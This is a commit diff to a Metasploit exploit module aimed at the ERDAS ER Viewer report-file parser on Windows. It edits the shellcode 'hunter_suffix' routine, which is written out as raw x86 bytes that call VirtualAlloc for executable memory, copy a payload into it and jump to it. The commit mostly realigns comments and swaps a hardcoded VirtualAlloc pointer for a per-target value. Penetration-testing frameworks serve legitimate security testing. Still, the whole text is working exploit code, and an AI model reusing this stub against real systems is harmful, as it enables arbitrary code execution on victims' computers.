Use metadata

2013-07-08 09:25:02 -05:00 · 2013-07-08 09:25:02 -05:00 · 3f874f504c
parent 512dd7d15a
commit 3f874f504c
1 changed files with 16 additions and 16 deletions
--- a/modules/exploits/windows/fileformat/erdas_er_viewer_rf_report_error.rb
+++ b/modules/exploits/windows/fileformat/erdas_er_viewer_rf_report_error.rb
@ -120,29 +120,29 @@ class Metasploit3 < Msf::Exploit::Remote
 	# and jump there. Badchars: "\x0a\x0d\x00"
 	def hunter_suffix(payload_length)
 		# push flProtect (0x40)
-		suffix = "\xB8\xC0\xFF\xFF\xFF"                       # mov eax, 0xffffffc0
-		suffix << "\xF7\xD8"                                  # neg eax
-		suffix << "\x50"                                      # push eax
+		suffix = "\xB8\xC0\xFF\xFF\xFF"                              # mov eax, 0xffffffc0
+		suffix << "\xF7\xD8"                                         # neg eax
+		suffix << "\x50"                                             # push eax
 		# push flAllocationType (0x3000)
-		suffix << "\x66\x05\xC0\x2F"                          # add ax, 0x2fc0
-		suffix << "\x50"                                      # push eax
+		suffix << "\x66\x05\xC0\x2F"                                 # add ax, 0x2fc0
+		suffix << "\x50"                                             # push eax
 		# push dwSize (0x1000)
-		suffix << "\x66\x2D\xFF\x1F"                          # sub ax, 0x1fff
-		suffix << "\x48"                                      # dec eax
-		suffix << "\x50"                                      # push eax
+		suffix << "\x66\x2D\xFF\x1F"                                 # sub ax, 0x1fff
+		suffix << "\x48"                                             # dec eax
+		suffix << "\x50"                                             # push eax
 		# push lpAddress
-		suffix << "\xB8\x0C\x0C\x0C\x0C"                      # mov eax, 0x0c0c0c0c
+		suffix << "\xB8\x0C\x0C\x0C\x0C"                             # mov eax, 0x0c0c0c0c
 		suffix << "\x50" # push eax
 		# Call VirtualAlloc
-		suffix << "\xFF\x15\xF4\xC0\x10\x10"                  # call near [0x1010c0f4]
+		suffix << "\xFF\x15" + [target['VirtualAllocPtr']].pack("V") # call ds:VirtualAlloc
 		# Copy payload (edi) to Allocated memory (eax)
-		suffix << "\x89\xFE"                                  # mov esi, edi
-		suffix << "\x89\xC7"                                  # mov edi, eax
-		suffix << "\x31\xC9"                                  # xor ecx, ecx
-		suffix << "\x66\x81\xC1" + [payload_length].pack("v") # add cx, payload_length
-		suffix << "\xF3\xA4"                                  # rep movsb
+		suffix << "\x89\xFE"                                         # mov esi, edi
+		suffix << "\x89\xC7"                                         # mov edi, eax
+		suffix << "\x31\xC9"                                         # xor ecx, ecx
+		suffix << "\x66\x81\xC1" + [payload_length].pack("v")        # add cx, payload_length
+		suffix << "\xF3\xA4"                                         # rep movsb
 		# Jmp to the final payload (eax)
-		suffix << "\xFF\xE0"                                  # jmp eax
+		suffix << "\xFF\xE0"                                         # jmp eax

 		return suffix
 	end